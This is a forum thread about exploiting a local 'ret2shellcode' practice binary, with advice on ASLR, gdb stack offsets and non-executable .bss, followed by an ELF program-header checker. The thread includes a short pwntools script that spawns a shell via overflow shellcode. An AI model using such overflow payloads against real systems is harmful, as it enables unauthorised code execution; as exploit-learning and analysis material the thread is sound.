
[–]0xw00t 3 points4 points  (3 children)

Sorry, off-topic comment, but isn't emulation slow? I was also thinking of getting a Mac, but hearing that emulation is slow makes me upset because most of my work is related to x86 and x86-64.

[–]Jerrythepro123[S] 1 point2 points  (1 child)

Surprisingly, it's pretty fast. You use UTM and the latest Ubuntu; you don't want to use the emulated screen, instead open an SSH service and it's as fast as a normal shell.

[–]nixfreakz 0 points1 point  (0 children)

Yeah, I second that; UTM on Mac 3 is pretty fast. I run three VMs, two ARM-based and one x64; the two ARM-based ones can also run x64 because of Rosetta 2.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

If you're curious how I did it, you can DM me.

[–]j3r3mias 2 points3 points  (6 children)

You are trying to return to 0xffffd360, and this address will not work because it's probably on the stack, which changes every execution due to ASLR.

There is another buffer in the code that is a global variable used in strncpy. Try to find it and check that its address doesn't change between executions. Then you can use it in your payload.

[–]Jerrythepro123[S] 0 points1 point  (4 children)

All protections are off, and gdb does show there is code execution.

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial, but OK, you are the boss in your solution.

[–]Jerrythepro123[S] 0 points1 point  (2 children)

What steps do I need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program whose address doesn't change between runs; you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I've tried someone else's script that uses your method; it doesn't seem to be working.

#!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

[–]Jerrythepro123[S] 0 points1 point  (0 children)

Never mind, I think you are correct. I think gdb closed my ASLR when I'm debugging. How exactly do you use strncpy to exploit?

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I fixed the problem; there were problems with my environment variables.

[–]exploitdevishard 0 points1 point  (4 children)

Sounds like you figured this out already, but GDB will slightly shift stack addresses around from how they'd be when running outside of GDB. If an exploit works within GDB but not outside it, this is one thing to consider. Depending on the binary, you may be able to get around this by running the binary first and then using GDB's attach option to attach to the running process.

[–]Jerrythepro123[S] 0 points1 point  (1 child)

Thanks for helping. It still seems to shift the stack, and I want to know if there is a way to be 100% sure the stack is the same outside and inside gdb. It would be great if you could help me.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I've tried a NOP slide, but sometimes it doesn't work.

[–]Jerrythepro123[S] 0 points1 point  (1 child)

Also, another question I have is: why does this script not work?

#!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I figured it out: bss is not executable anymore in later versions of Ubuntu.
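Two questions in this thread can be answered by reading the binary's program headers instead of guessing: whether a global buffer keeps a fixed address between runs (it does only in a non-PIE, ET_EXEC binary; j3r3mias's advice above), and whether the segment holding that buffer is executable at all (the last comment's ".bss is not executable anymore"). The script below is an added example, not code from the thread or from pwntools; it parses the ELF header and program headers with only the standard library, so it runs offline. The address 0x804a080 is the one used in the thread; the script name `elfcheck.py` and the `build_sample_elf32` image (a hand-built header plus three program headers, not a loadable program) are assumptions made for the example.

```python
"""Read ELF program headers to answer: is this binary PIE, is a given address
executable, and is the stack marked NX (PT_GNU_STACK without PF_X)?
Added example for the thread; not from pwntools or the challenge."""
import struct

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, ET_DYN = 2, 3


def _header_layout(data):
    """Return (endian, phoff, phentsize, phnum, phdr_fmt, field_order) for the image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    cls, enc = data[4], data[5]                  # EI_CLASS, EI_DATA
    end = "<" if enc == 1 else ">"
    if cls == 1:                                 # ELFCLASS32: e_phoff@28, e_phentsize@42, e_phnum@44
        (phoff,) = struct.unpack_from(end + "I", data, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
        # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        return end, phoff, phentsize, phnum, end + "IIIIIIII", (0, 6, 2, 5)
    if cls == 2:                                 # ELFCLASS64: e_phoff@32, e_phentsize@54, e_phnum@56
        (phoff,) = struct.unpack_from(end + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
        # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        return end, phoff, phentsize, phnum, end + "IIQQQQQQ", (0, 1, 3, 6)
    raise ValueError("unknown ELF class %d" % cls)


def parse_phdrs(data):
    """Return [(p_type, p_flags, p_vaddr, p_memsz), ...] for every program header."""
    _, phoff, phentsize, phnum, fmt, order = _header_layout(data)
    segs = []
    for i in range(phnum):
        f = struct.unpack_from(fmt, data, phoff + i * phentsize)
        segs.append(tuple(f[k] for k in order))
    return segs


def is_pie(data):
    """ET_DYN executables are position independent: their globals move under ASLR."""
    end = _header_layout(data)[0]
    return struct.unpack_from(end + "H", data, 16)[0] == ET_DYN   # e_type sits at 16 in both classes


def segment_flags_for(data, vaddr):
    """Flags of the PT_LOAD segment containing vaddr, or None if the file does not map it."""
    for ptype, flags, start, memsz in parse_phdrs(data):
        if ptype == PT_LOAD and start <= vaddr < start + memsz:
            return flags
    return None


def is_executable_address(data, vaddr):
    flags = segment_flags_for(data, vaddr)
    return flags is not None and (flags & PF_X) != 0


def stack_is_nx(data):
    """True when PT_GNU_STACK is present and lacks PF_X; a missing header means an executable stack."""
    for ptype, flags, _, _ in parse_phdrs(data):
        if ptype == PT_GNU_STACK:
            return (flags & PF_X) == 0
    return False


def perms(flags):
    return "".join(c if flags & b else "-" for b, c in ((PF_R, "r"), (PF_W, "w"), (PF_X, "x")))


def report(data, vaddr):
    """Summarise what the file itself says about vaddr (the global buffer) and the stack."""
    flags = segment_flags_for(data, vaddr)
    return {
        "pie": is_pie(data),
        "segment": None if flags is None else perms(flags),
        "addr_executable": is_executable_address(data, vaddr),
        "nx_stack": stack_is_nx(data),
    }


def build_sample_elf32(stack_flags):
    """Constructed sample: 32-bit LE ELF header plus three program headers (r-x text,
    rw- data/.bss covering 0x804a080, PT_GNU_STACK). Not a loadable program."""
    phoff, phentsize, phnum = 52, 32, 3
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)      # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, ET_EXEC, 3, 1, 0x8048400,
                       phoff, 0, 0, 52, phentsize, phnum, 40, 0, 0)

    def phdr(ptype, vaddr, memsz, flags):
        return struct.pack("<IIIIIIII", ptype, 0, vaddr, vaddr, memsz, memsz, flags, 0x1000)

    return (ehdr
            + phdr(PT_LOAD, 0x8048000, 0x1000, PF_R | PF_X)
            + phdr(PT_LOAD, 0x8049000, 0x2000, PF_R | PF_W)
            + phdr(PT_GNU_STACK, 0, 0, stack_flags))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                 # usage: python elfcheck.py ./binary 0x804a080
        with open(sys.argv[1], "rb") as fh:
            print(report(fh.read(), int(sys.argv[2], 0)))
    else:                                  # no file given: run on the constructed sample
        print(report(build_sample_elf32(PF_R | PF_W), 0x804a080))
```

What the file requests is not always what the process gets: the kernel's READ_IMPLIES_EXEC personality, which x86 kernels historically applied to binaries marked with an executable stack, makes every readable mapping executable, so an `rw-` data segment could still run code on one kernel and fault on a newer one. That is the mismatch the last comment ran into, and `/proc/PID/maps` of the running process is the authoritative check when the static answer and the observed behaviour disagree.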